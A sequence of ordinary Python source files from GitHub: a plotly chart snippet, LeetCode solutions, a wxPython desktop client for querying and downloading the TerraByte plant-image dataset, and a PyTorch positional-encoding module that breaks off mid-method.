y=self.data[col].values.reshape(-1) / 1e4,
mode='lines+markers',
name=col))
fig.update_layout(title={
'y': 0.9,
'x': 0.5,
'xanchor': 'center',
'yanchor': 'top',
'text': '近年資產負債表'
},
yaxis_title='$NTD 萬')
return fig
app.run_server(mode='external')
| yuhsuanyang/stock_market_analysis | code/visualizers/asset_debt_visualizer.py | asset_debt_visualizer.py | py | 5,608 | python | en | code | 1 | github-code | 50 |
28076365082 | # -*- coding: utf-8 -*-
"""
@Author 坦克手贝塔
@Date 2022/2/24 16:36
"""
"""
给定一个单链表,其中的元素按升序排序,将其转换为高度平衡的二叉搜索树。
本题中,一个高度平衡二叉树是指一个二叉树每个节点 的左右两个子树的高度差的绝对值不超过 1。
给定的有序链表: [-10, -3, 0, 5, 9]
一个可能的答案是:[0, -3, 9, -10, null, 5]
"""
"""
思路:快慢指针每次找中间一个即可
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, val=0, next=None):
self.val = val
self.next = next
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution(object):
@staticmethod
def sorted_list_to_bst(head):
"""
:type head: Optional[ListNode]
:rtype: Optional[TreeNode]
"""
def get_mid(left, right):
fast = slow = left
while fast != right and fast.next != right:
fast = fast.next.next
slow = slow.next
return slow
def build_tree(left, right):
if left == right:
return None
mid = get_mid(left, right)
root = TreeNode(mid.val)
root.left = build_tree(left, mid)
root.right = build_tree(mid.next, right)
return root
return build_tree(head, None)
| TankManBeta/LeetCode-Python | problem109_medium.py | problem109_medium.py | py | 1,560 | python | en | code | 0 | github-code | 50 |
33363570959 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# Michael Beck
#
# Core
import json
import logging
import datetime
import os
import sys
# Third party
import wx
import wx.adv
# Own
from client.commands import bind_command, check_cmd, sample_cmd, download_cmd, \
login_cmd, logout_cmd, update_archives_cmd
if getattr(sys, 'frozen', False):
Current_Path = os.path.dirname(sys.executable)
else:
Current_Path = str(os.path.dirname(__file__))
VERSION = "1.0.1"
SAMPLE_SIZE = 20
JSON_LOCATION = os.path.join(Current_Path, "parameters.json")
METADATA_LOCATION = os.path.join(Current_Path, "metadata.json")
class Main(wx.Frame):
def __init__(self, *args, **kwds):
# Confirm License
license_dialog = LicenseDialog(None, wx.ID_ANY, "")
if license_dialog.ShowModal() != wx.ID_OK:
self.logger.warning("License was not agreed on.")
license_dialog.Destroy()
return None
license_dialog.Destroy()
with open(METADATA_LOCATION, "r") as f:
metadata = json.load(f) # TODO: Have a way of getting this from the server instead
# Setup logger
self.logger = logging.getLogger("Client.Main")
self.logger.setLevel(logging.DEBUG)
# Setup Frame
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.SetSize((555, 539))
self.SetTitle("TerraByte Client")
self.tabs = wx.Notebook(self, wx.ID_ANY)
self.eaglidata_tab = wx.Panel(self.tabs, wx.ID_ANY)
self.tabs.AddPage(self.eaglidata_tab, "EAGL-I Data")
sizer_1 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_2 = wx.FlexGridSizer(3, 4, 5, 5)
sizer_1.Add(grid_sizer_2, 1, wx.EXPAND | wx.LEFT, 5)
label_start_date = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Start Date:")
grid_sizer_2.Add(label_start_date, 0, wx.EXPAND, 0)
self.datepicker_start_date = wx.adv.DatePickerCtrl(
self.eaglidata_tab,
wx.ID_ANY,
dt=wx.DateTime(17, 3, year=2020),
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_2.Add(self.datepicker_start_date, 0, wx.EXPAND, 0)
label_end_date = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "End Date:")
grid_sizer_2.Add(label_end_date, 0, wx.EXPAND, 0)
today = wx.DateTime().SetToCurrent()
self.datepicker_end_date = wx.adv.DatePickerCtrl(
self.eaglidata_tab,
wx.ID_ANY,
dt=today,
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_2.Add(self.datepicker_end_date, 0, wx.EXPAND, 0)
label_age_min = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Min. age in days:")
grid_sizer_2.Add(label_age_min, 0, wx.EXPAND, 0)
self.spin_age_min = wx.SpinCtrl(self.eaglidata_tab, wx.ID_ANY, "0", min=0, max=1000)
grid_sizer_2.Add(self.spin_age_min, 0, wx.EXPAND, 0)
label_age_max = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Max. age in days:")
grid_sizer_2.Add(label_age_max, 0, wx.EXPAND, 0)
self.spin_age_max = wx.SpinCtrl(self.eaglidata_tab, wx.ID_ANY, "1000", min=0, max=1000)
grid_sizer_2.Add(self.spin_age_max, 0, wx.EXPAND, 0)
label_plants = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Plants:")
grid_sizer_2.Add(label_plants, 0, wx.EXPAND, 0)
self.check_list_plants = wx.CheckListBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=metadata["eagli_plants"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT
)
self.check_list_plants.SetMinSize((113, 80))
grid_sizer_2.Add(self.check_list_plants, 0, wx.EXPAND, 0)
sizer_6 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_2.Add(sizer_6, 1, wx.EXPAND, 0)
label_plant_id = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Plant ID:")
sizer_6.Add(label_plant_id, 0, wx.EXPAND, 0)
label_resolution_minimum = wx.StaticText(
self.eaglidata_tab,
wx.ID_ANY,
"Min. Resolution (px):"
)
sizer_6.Add(label_resolution_minimum, 0, wx.TOP, 10)
label_resolution_maximum = wx.StaticText(
self.eaglidata_tab, wx.ID_ANY, "Max. Resolution (px):"
)
sizer_6.Add(label_resolution_maximum, 0, wx.TOP, 5)
label_perspective = wx.StaticText(
self.eaglidata_tab, wx.ID_ANY, "Perspective:"
)
sizer_6.Add(label_perspective, 0, wx.TOP, 20)
sizer_7 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_2.Add(sizer_7, 1, wx.EXPAND, 0)
self.text_plant_id = wx.TextCtrl(self.eaglidata_tab, wx.ID_ANY, "")
sizer_7.Add(self.text_plant_id, 0, wx.EXPAND, 0)
self.spin_resolution_min = wx.SpinCtrl(
self.eaglidata_tab, wx.ID_ANY, "0", min=0, max=4000
)
sizer_7.Add(self.spin_resolution_min, 0, wx.EXPAND, 0)
self.spin_resolution_max = wx.SpinCtrl(
self.eaglidata_tab, wx.ID_ANY, "4000", min=0, max=4000
)
sizer_7.Add(self.spin_resolution_max, 0, wx.EXPAND, 0)
self.perspective_box = wx.RadioBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=["Any", "Top-down", "Oblique", "Profile"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT,
majorDimension=1
)
'''self.perspective_box = wx.CheckListBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=["Top-down", "Oblique", "Profile"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT
)'''
self.perspective_box.SetMinSize((113, 110))
sizer_7.Add(self.perspective_box, 0, wx.EXPAND, 0)
static_line_1 = wx.StaticLine(self.eaglidata_tab, wx.ID_ANY)
sizer_1.Add(static_line_1, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_5 = wx.GridSizer(4, 2, 0, 0)
sizer_1.Add(sizer_5, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
self.checkbox_single_plant_images = wx.CheckBox(
self.eaglidata_tab, wx.ID_ANY, "Single Plant Images"
)
self.checkbox_single_plant_images.SetValue(1)
sizer_5.Add(self.checkbox_single_plant_images, 0, wx.EXPAND, 0)
label_archived_queries = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Archived Queries:")
sizer_5.Add(label_archived_queries, 0, wx.EXPAND, 0)
self.checkbox_multiple_plant_images = wx.CheckBox(
self.eaglidata_tab, wx.ID_ANY, "Multiple Plant Images"
)
sizer_5.Add(self.checkbox_multiple_plant_images, 0, wx.EXPAND, 0)
plant_list = [""]
plant_list.extend(metadata["eagli_archives"])
self.combo_box_archived_queries = wx.ComboBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=plant_list,
style=wx.CB_DROPDOWN | wx.CB_READONLY | wx.CB_SORT
)
sizer_5.Add(self.combo_box_archived_queries, 0, wx.EXPAND, 0)
self.checkbox_bounding_box_images = wx.CheckBox(
self.eaglidata_tab, wx.ID_ANY, "Bounding Box Images"
)
sizer_5.Add(self.checkbox_bounding_box_images, 0, wx.EXPAND, 0)
sizer_5.Add((0, 0), 0, 0, 0)
self.checkbox_json_files = wx.CheckBox(self.eaglidata_tab, wx.ID_ANY, "JSON Files")
sizer_5.Add(self.checkbox_json_files, 0, wx.EXPAND, 0)
sizer_5.Add((0, 0), 0, 0, 0)
static_line_2 = wx.StaticLine(self.eaglidata_tab, wx.ID_ANY)
sizer_1.Add(static_line_2, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_3 = wx.BoxSizer(wx.VERTICAL)
sizer_1.Add(sizer_3, 1, wx.EXPAND, 0)
result_header_label = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Result:")
sizer_3.Add(result_header_label, 0, 0, 0)
self.result_label = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "")
sizer_3.Add(self.result_label, 0, wx.EXPAND, 0)
grid_sizer_1 = wx.GridSizer(2, 3, 0, 0)
sizer_1.Add(grid_sizer_1, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
self.check_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Check Query")
self.check_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.check_button, 0, 0, 0)
self.sample_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Get Sample")
self.sample_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.sample_button, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.download_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Download")
self.download_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.download_button, 0, wx.ALIGN_RIGHT, 0)
self.credentials_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Set Credentials")
self.credentials_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.credentials_button, 0, 0, 0)
self.sample_path_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Set Sample Path")
self.sample_path_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.sample_path_button, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.download_path_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Set Download Path")
self.download_path_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.download_path_button, 0, wx.ALIGN_RIGHT, 0)
self.fielddata_tab = wx.Panel(self.tabs, wx.ID_ANY)
self.tabs.AddPage(self.fielddata_tab, "Fielddata")
sizer_2 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_3 = wx.FlexGridSizer(3, 4, 5, 5)
sizer_2.Add(grid_sizer_3, 1, wx.EXPAND | wx.LEFT, 5)
label_start_date_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "Start Date:")
grid_sizer_3.Add(label_start_date_field, 0, 0, 0)
self.datepicker_start_date_field = wx.adv.DatePickerCtrl(
self.fielddata_tab,
wx.ID_ANY,
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_3.Add(self.datepicker_start_date_field, 0, wx.EXPAND, 0)
label_end_date_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "End Date:")
grid_sizer_3.Add(label_end_date_field, 0, 0, 0)
self.datepicker_end_date_field = wx.adv.DatePickerCtrl(
self.fielddata_tab,
wx.ID_ANY,
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_3.Add(self.datepicker_end_date_field, 0, wx.EXPAND, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
label_plants_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "Plants:")
grid_sizer_3.Add(label_plants_field, 0, 0, 0)
self.check_list_plants_field = wx.CheckListBox(
self.fielddata_tab,
wx.ID_ANY,
choices=metadata["field_plants"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT
)
self.check_list_plants_field.SetMinSize((113, 80))
grid_sizer_3.Add(self.check_list_plants_field, 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
static_line_3 = wx.StaticLine(self.fielddata_tab, wx.ID_ANY)
sizer_2.Add(static_line_3, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_10 = wx.GridSizer(4, 2, 0, 0)
sizer_2.Add(sizer_10, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
sizer_10.Add((0, 0), 0, 0, 0)
label_archived_queries_field = wx.StaticText(
self.fielddata_tab, wx.ID_ANY, "Archived Queries:"
)
sizer_10.Add(label_archived_queries_field, 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
plant_list = [""]
plant_list.extend(metadata["field_archives"])
self.combo_box_archived_queries_field = wx.ComboBox(
self.fielddata_tab,
wx.ID_ANY,
choices=plant_list,
style=wx.CB_DROPDOWN | wx.CB_READONLY | wx.CB_SORT
)
sizer_10.Add(self.combo_box_archived_queries_field, 0, wx.EXPAND, 0)
sizer_10.Add((0, 0), 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
static_line_4 = wx.StaticLine(self.fielddata_tab, wx.ID_ANY)
sizer_2.Add(static_line_4, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_4 = wx.BoxSizer(wx.VERTICAL)
sizer_2.Add(sizer_4, 1, wx.EXPAND, 0)
result_header_label_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "Result:")
sizer_4.Add(result_header_label_field, 0, 0, 0)
self.result_label_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "")
sizer_4.Add(self.result_label_field, 0, wx.EXPAND, 0)
grid_sizer_4 = wx.GridSizer(2, 3, 0, 0)
sizer_2.Add(grid_sizer_4, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
self.check_button_field = wx.Button(self.fielddata_tab, wx.ID_ANY, "Check Query")
self.check_button_field.SetMinSize((125, 26))
grid_sizer_4.Add(self.check_button_field, 0, 0, 0)
self.sample_button_field = wx.Button(self.fielddata_tab, wx.ID_ANY, "Get Sample")
self.sample_button_field.SetMinSize((125, 26))
grid_sizer_4.Add(self.sample_button_field, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.download_button_field = wx.Button(self.fielddata_tab, wx.ID_ANY, "Download")
self.download_button_field.SetMinSize((125, 26))
grid_sizer_4.Add(self.download_button_field, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_4.Add((0, 0), 0, 0, 0)
grid_sizer_4.Add((0, 0), 0, 0, 0)
grid_sizer_4.Add((0, 0), 0, 0, 0)
self.info_tab = wx.Panel(self.tabs, wx.ID_ANY)
self.tabs.AddPage(self.info_tab, "Info")
sizer_8 = wx.BoxSizer(wx.VERTICAL)
label_version = wx.StaticText(self.info_tab, wx.ID_ANY, "Version: "+VERSION)
sizer_8.Add(label_version, 0, 0, 0)
label_author = wx.StaticText(
self.info_tab,
wx.ID_ANY,
"The TerraByte Client is developed by Michael Beck. "
"Contact: m.beck@uwinnipeg.ca"
)
sizer_8.Add(label_author, 0, 0, 0)
self.hyperlink_citation_info = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"Citation Information and Terms of use",
"https://terrabyte.acs.uwinnipeg.ca/resources.html#tools"
)
sizer_8.Add(self.hyperlink_citation_info, 0, 0, 0)
self.hyperlink_parameter_explanation = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"Manual",
"https://terrabyte.acs.uwinnipeg.ca/assets/programs/TB_Client_Manual.pdf"
)
sizer_8.Add(self.hyperlink_parameter_explanation, 0, 0, 0)
self.video_tutorial = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"Video Explanation",
"https://youtu.be/2MX4ascCTq0"
)
sizer_8.Add(self.video_tutorial, 0, 0, 0)
self.github = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"GitHub",
"https://github.com/UWDigitalAg/TerraByte_Client"
)
sizer_8.Add(self.github, 0, 0, 0)
self.info_tab.SetSizer(sizer_8)
grid_sizer_3.AddGrowableRow(0)
grid_sizer_3.AddGrowableRow(1)
grid_sizer_3.AddGrowableCol(0)
grid_sizer_3.AddGrowableCol(2)
grid_sizer_3.AddGrowableCol(3)
self.fielddata_tab.SetSizer(sizer_2)
grid_sizer_2.AddGrowableRow(0)
grid_sizer_2.AddGrowableRow(1)
grid_sizer_2.AddGrowableRow(2)
grid_sizer_2.AddGrowableCol(0)
grid_sizer_2.AddGrowableCol(1)
grid_sizer_2.AddGrowableCol(2)
grid_sizer_2.AddGrowableCol(3)
self.eaglidata_tab.SetSizer(sizer_1)
self.Layout()
# Give buttons dataset context
for b in [self.check_button, self.sample_button, self.download_button]:
b.dataset = "combined_images" # EAGL-I data
for b in [self.check_button_field, self.sample_button_field, self.download_button_field]:
b.dataset = "field_images" # Field data
self.Bind(wx.EVT_BUTTON, self.send_check_request, self.check_button)
self.Bind(wx.EVT_BUTTON, self.send_sample_request, self.sample_button)
self.Bind(wx.EVT_BUTTON, self.send_download_request, self.download_button)
self.Bind(wx.EVT_BUTTON, self.update_user_credentials, self.credentials_button)
self.Bind(wx.EVT_BUTTON, self.change_sample_path, self.sample_path_button)
self.Bind(wx.EVT_BUTTON, self.change_download_path, self.download_path_button)
self.Bind(wx.EVT_BUTTON, self.send_check_request, self.check_button_field)
self.Bind(wx.EVT_BUTTON, self.send_sample_request, self.sample_button_field)
self.Bind(wx.EVT_BUTTON, self.send_download_request, self.download_button_field)
# end wxGlade
# Load parameters from last session
try:
with open(JSON_LOCATION, 'r') as f:
self.parameters = json.load(f)
except FileNotFoundError:
self.username = ""
self.password = ""
os.mkdir("sample")
os.mkdir("download")
self.sample_dir = "./sample"
self.download_dir = "./download"
json_obj = {
"login": "",
"password": "",
"sample": "./sample",
"download": "./download"
}
with open(JSON_LOCATION, "w") as f:
json.dump(json_obj, f)
self.parameters = json_obj
self.username = self.parameters["login"]
self.password = self.parameters["password"]
# Load directory locations from last session
self.sample_dir = self.parameters["sample"]
self.download_dir = self.parameters["download"]
# Sample size
self.sample_size = SAMPLE_SIZE
# GUI-input package to be sent to commands
self.query_parameters = {}
self.eagli_parameters = {}
self.field_query_parameters = {}
self.gui_input = {}
# Initialize parameters
self.update_parameters()
# Login User with previously given credentials
data = login_cmd(
self.gui_input, password=self.parameters["password"]
)
self.update_gui(data)
# Get archive list
self.update_gui(update_archives_cmd(self.gui_input))
    @bind_command(check_cmd)
    def send_check_request(self, event): # wxGlade: Main.<event_handler>
        # Empty body: @bind_command presumably wraps this handler so that
        # check_cmd runs with the current GUI input when the event fires --
        # confirm against the bind_command decorator's definition.
        pass
    @bind_command(sample_cmd)
    def send_sample_request(self, event): # wxGlade: Main.<event_handler>
        # Empty body: behavior is supplied by @bind_command(sample_cmd).
        pass
    @bind_command(download_cmd)
    def send_download_request(self, event): # wxGlade: Main.<event_handler>
        # Empty body: behavior is supplied by @bind_command(download_cmd).
        pass
    def update_user_credentials(self, event): # wxGlade: Main.<event_handler>
        """Prompt for a new username/password, then refresh the session.

        Both dialogs are modal; if either is cancelled the stored credentials
        stay unchanged.  Parameters are re-saved and a logout/login cycle is
        performed in every case.
        """
        self.logger.info("Updating user credentials...")
        username_dialog = wx.TextEntryDialog(
            self, message="Username:"
        )
        if username_dialog.ShowModal() == wx.ID_OK:
            password_dialog = wx.PasswordEntryDialog(
                self, message="Password:"
            )
            if password_dialog.ShowModal() == wx.ID_OK:
                self.username = username_dialog.GetValue()
                self.password = password_dialog.GetValue()
            password_dialog.Destroy()
        username_dialog.Destroy()
        self.update_parameters(write_json=True)
        logout_cmd(self.gui_input)
        # password passed as extra argument to not have it appear in log files
        data = login_cmd(self.gui_input, password=self.password)
        self.update_gui(data)
        event.Skip()
def change_sample_path(self, event): # wxGlade: Main.<event_handler>
self.logger.info("Update path to sample folder...")
directory_dialog = wx.DirDialog(
self, message="Choose folder for sample preview"
)
if directory_dialog.ShowModal() == wx.ID_OK:
self.sample_dir = directory_dialog.GetPath()
directory_dialog.Destroy()
self.update_parameters(write_json=True)
event.Skip()
def change_download_path(self, event): # wxGlade: Main.<event_handler>
self.logger.info("Update path to download folder...")
directory_dialog = wx.DirDialog(
self, message="Choose download folder"
)
if directory_dialog.ShowModal() == wx.ID_OK:
self.download_dir = directory_dialog.GetPath()
directory_dialog.Destroy()
self.update_parameters(write_json=True)
event.Skip()
def update_parameters(self, event=None, write_json=False):
self.logger.info("Updating client parameters")
if write_json:
with open("./parameters.json", "w") as f:
json.dump({
"login": self.username,
"password": self.password,
"download": self.download_dir,
"sample": self.sample_dir}, f
)
self.eagli_parameters = {
"start_date": self._wxdate2pydate(self.datepicker_start_date.GetValue()),
"end_date": self._wxdate2pydate(self.datepicker_end_date.GetValue()),
"min_age": self.spin_age_min.GetValue(),
"max_age": self.spin_age_max.GetValue(),
"plants": list(self.check_list_plants.GetCheckedStrings()),
"plant_id": self.text_plant_id.GetValue(),
"min_res": self.spin_resolution_min.GetValue(),
"max_res": self.spin_resolution_max.GetValue(),
"single_plant_output": self.checkbox_single_plant_images.GetValue(), # True/False
"multiple_plant_output": self.checkbox_multiple_plant_images.GetValue(),
"bounding_box_output": self.checkbox_bounding_box_images.GetValue(),
"json_output": self.checkbox_json_files.GetValue(),
"archive_selection": self.combo_box_archived_queries.GetValue(),
"perspectives": self.perspective_box.GetStringSelection(),
}
self.field_query_parameters = {
"start_date": self._wxdate2pydate(self.datepicker_start_date_field.GetValue()),
"end_date": self._wxdate2pydate(self.datepicker_end_date_field.GetValue()),
"plants": list(self.check_list_plants_field.GetCheckedStrings()),
"archive_selection": self.combo_box_archived_queries_field.GetValue(),
}
self.gui_input = {
"username": self.username,
"query_parameters": {
"eagli_parameters": self.eagli_parameters,
"field_parameters": self.field_query_parameters
},
"sample_size": self.sample_size,
"sample_dir": self.sample_dir,
"download_dir": self.download_dir,
}
if event:
self.gui_input["dataset"] = event.GetEventObject().dataset
else:
self.gui_input["dataset"] = ""
    def update_gui(self, gui_output):
        """Push a command's result dict into the GUI and refresh metadata.

        Recognized keys in gui_output:
          - "message": shown in the result labels of both tabs
          - "error": appended to the current message text
          - "archive_list": rows used to refill the archived-query comboboxes
            and to rewrite metadata.json
        """
        if "message" in gui_output.keys():
            self.result_label.SetLabelText(gui_output["message"])
            self.result_label_field.SetLabelText(gui_output["message"])
        if "error" in gui_output.keys():
            msg = self.result_label.Label
            self.result_label.SetLabelText(msg + " Error: " + gui_output["error"])
            self.result_label_field.SetLabelText(msg + " Error: " + gui_output["error"])
        if "archive_list" in gui_output.keys():
            # Per-dataset bookkeeping: which combobox/tab to refresh and
            # which metadata.json key to rewrite.
            collections_list = {
                "combined_images": {
                    "combobox": self.combo_box_archived_queries,
                    "archives": [],
                    "tab": self.eaglidata_tab,
                    "JSON_name": "eagli_archives"
                },
                "field_images": {
                    "combobox": self.combo_box_archived_queries_field,
                    "archives": [],
                    "tab": self.fielddata_tab,
                    "JSON_name": "field_archives"
                },
            }
            # Split archive list by collection
            for row in gui_output["archive_list"]:
                for data_type in collections_list.keys():
                    if row[2] == data_type:
                        collections_list[data_type]["archives"].append(row)
            # Update Comboboxes
            for collection in collections_list.values():
                collection["combobox"].Clear()
                # Leading blank entry means "no archive selected".
                collection["combobox"].AppendItems([""])
                collection["combobox"].AppendItems([
                    row[1] + f" ({row[-1]} GB)" for row in collection["archives"]
                ])
                self.Update()
            # Update JSON-Files
            with open("metadata.json", "r") as f:
                self.logger.info("Updating metadata.json")
                old_metadata = json.load(f)
            for collection in collections_list.values():
                old_metadata[collection["JSON_name"]] = [
                    row[1] + f" ({row[-1]} GB)" for row in collection["archives"]
                ]
            with open("metadata.json", "w") as f:
                json.dump(old_metadata, f)
@staticmethod
def _wxdate2pydate(wx_date):
f = wx_date.Format('%d/%m/%y %H:%M:%S')
return datetime.datetime.strptime(f, '%d/%m/%y %H:%M:%S')
# end of class Main
class LicenseDialog(wx.Dialog):
    """Modal dialog showing license.txt; OK is enabled only after agreement."""

    def __init__(self, *args, **kwds):
        # begin wxGlade: MyDialog.__init__
        kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_DIALOG_STYLE
        wx.Dialog.__init__(self, *args, **kwds)
        self.SetTitle("License Agreement")
        sizer_1 = wx.BoxSizer(wx.VERTICAL)
        with open("license.txt", "r") as f:
            lines = f.read()
        label_1 = wx.StaticText(self, wx.ID_ANY, lines)
        sizer_1.Add(label_1, 0, wx.LEFT | wx.RIGHT, 10)
        self.agree_box = wx.CheckBox(self, wx.ID_ANY, "I agree to the above license and terms of usage.")
        sizer_1.Add(self.agree_box, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 10)
        sizer_2 = wx.StdDialogButtonSizer()
        sizer_1.Add(sizer_2, 0, wx.ALIGN_RIGHT | wx.ALL, 4)
        self.button_OK = wx.Button(self, wx.ID_OK, "")
        self.button_OK.Enable(False)  # disabled until the checkbox is ticked
        self.button_OK.SetDefault()
        self.agreed = False  # mirrors the checkbox state
        sizer_2.AddButton(self.button_OK)
        self.button_CANCEL = wx.Button(self, wx.ID_CANCEL, "")
        sizer_2.AddButton(self.button_CANCEL)
        sizer_2.Realize()
        self.SetSizer(sizer_1)
        sizer_1.Fit(self)
        self.SetAffirmativeId(self.button_OK.GetId())
        self.SetEscapeId(self.button_CANCEL.GetId())
        self.Layout()
        self.Bind(wx.EVT_CHECKBOX, self.enable_ok, self.agree_box)
        # end wxGlade

    def enable_ok(self, event):  # wxGlade: MyDialog.<event_handler>
        """Mirror the checkbox state into self.agreed and the OK button.

        Reads the checkbox state from the event instead of toggling
        `not self.agreed`, so a missed or duplicated event cannot leave the
        flag out of sync with what the user actually sees.
        """
        self.agreed = event.IsChecked()
        self.button_OK.Enable(self.agreed)
        event.Skip()
# end of class MyDialog
# noinspection PyAttributeOutsideInit
class TerraByteClient(wx.App):
    """wx.App wrapper that creates and shows the main TerraByte window."""

    def OnInit(self):
        self.frame = Main(None, wx.ID_ANY, "")
        try:
            self.SetTopWindow(self.frame)
        except RuntimeError:
            # Raised when the main frame no longer exists (license declined).
            print("License must be agreed to")
        else:
            self.frame.Show()
        return True
# end of class TerraByteClient
if __name__ == "__main__":
    # Script entry point: start the wx application and its event loop.
    app = TerraByteClient(0)
    app.MainLoop()
| UWDigitalAg/TerraByte_Client | client_app.py | client_app.py | py | 27,873 | python | en | code | 2 | github-code | 50 |
20935625661 | # -*- coding:utf-8 -*-
class Solution:
    """Find any duplicated value in a list of numbers."""

    def duplicate(self, numbers, duplication):
        """Store the first duplicate of `numbers` in duplication[0].

        Returns True when a duplicate exists, else False.  Uses a set
        instead of the original flag array, which generalizes the method:
        the flag-array version indexed flag[numbers[i]] and therefore
        required every value to lie in [0, len(numbers)); this version
        accepts any hashable values, still in O(n) time.
        """
        seen = set()
        for value in numbers:
            if value in seen:
                duplication[0] = value
                return True
            seen.add(value)
        return False
| Jason-Woo/leetcode_problemset | jz_problemset/jz50/code.py | code.py | py | 499 | python | en | code | 0 | github-code | 50 |
72611241114 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from astlib.tensor_utils.analyze import level
class PositionalEncoder(nn.Module):
    """Add the standard fixed sinusoidal positional encoding to a tensor.

    The encoding table is precomputed for `max_len` positions and stored as
    a non-trainable buffer named "pe" with shape [max_len, 1, d_model].
    """

    def __init__(self, d_model, max_len=5000):
        super(PositionalEncoder, self).__init__()
        positions = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        # Geometric frequency ladder: exp(-log(10000) * (2k / d_model)).
        frequencies = torch.exp(
            torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model)
        )
        table = torch.zeros(max_len, d_model)
        table[:, 0::2] = torch.sin(positions * frequencies)  # even dims
        table[:, 1::2] = torch.cos(positions * frequencies)  # odd dims
        self.register_buffer("pe", table.unsqueeze(1))

    def forward(self, x):
        """Add positional encodings to x of shape [N, B, D] and return it."""
        return x + self.pe[: x.size(0), :]
class LevelPositionalEmbedding(nn.Module):
    """Learned positional embedding indexed by each node's tree level."""

    def __init__(self, embedding_dim: int, num_embeddings: int = 200):
        super().__init__()
        # Maximum tree depth (+1 for the padding slot) this layer supports.
        self.num_embeddings = num_embeddings
        self.embedding_dim = embedding_dim
        # Index 0 is reserved for padding tokens (zero vector, no gradient).
        self.pos_embedding = nn.Embedding(num_embeddings, embedding_dim, padding_idx=0)

    def forward(self, x, node_incidences):
        """
        x should have dimensions [N, B, D].
        node_incidences is expected to be of size [B x N x N] and is passed
        to `level` to derive each node's depth.
        """
        # root has level 0 and padding tokens should have level -1
        levels = level(node_incidences)  # [B, N]
        # Shift so padding maps to index 0 (the Embedding's padding_idx).
